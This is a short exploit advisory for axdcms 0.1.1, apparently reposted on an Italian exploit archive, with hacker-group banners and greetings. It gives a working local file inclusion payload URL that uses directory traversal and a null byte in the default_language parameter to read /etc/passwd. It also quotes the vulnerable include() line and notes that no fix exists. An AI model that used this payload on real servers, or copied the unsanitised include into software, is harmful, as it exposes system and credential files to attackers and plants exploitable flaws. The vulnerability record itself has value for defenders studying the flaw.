axdcms-0.1.1 Local File Include Vulnerbility

2011-01-08 09:16:02

###############################################
# _______ _______
# _______ __ __ \_______ __ __ \____ __
# __ _ \_ / / /__ __ \_ / / /__ |/_/
# _ / / // /_/ / _ / / // /_/ / __> <
# /_/ /_/ \____/ /_/ /_/ \____/ /_/|_|
#
# priasantai.uni.cc | team-elite.us
###############################################

#######################################################
#
# axdcms-0.1.1 <=== Local File Include Vulnerbility
#
#######################################################
# Author : n0n0x
#
# Homepage: http://priasantai.uni.cc/
#
# Download script : http://biznetnetworks.dl.sourceforge.net/project/axdcms/axdcms/0.1.1/axdcms-0.1.1.zip
#######################################################


exploit :

http://localhost/www/axdcms-0.1.1/modules/profile/user.php?aXconf[default_language]=../../../../../../../../etc/passwd%00

c0de :

include("modules/profile/lang/".$aXconf['default_language'].".php");


#######################################################
# Greetz: all member | manadocoding.org - sekuritiOnline.net - h4ckb0x.org
#
# friends: angky.tatoki, EA ngel, bL4Ck_3n91n3, opa, xoron, pitch, thama, s0ny,
# devilbat, cr4wl3r, cyberl0g, lumut-, Anti_Hack, DskyMC, mr.c, doniskynet.
#
# chats : irc.auzs.net 6667-7000 #exploit-db
######################################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.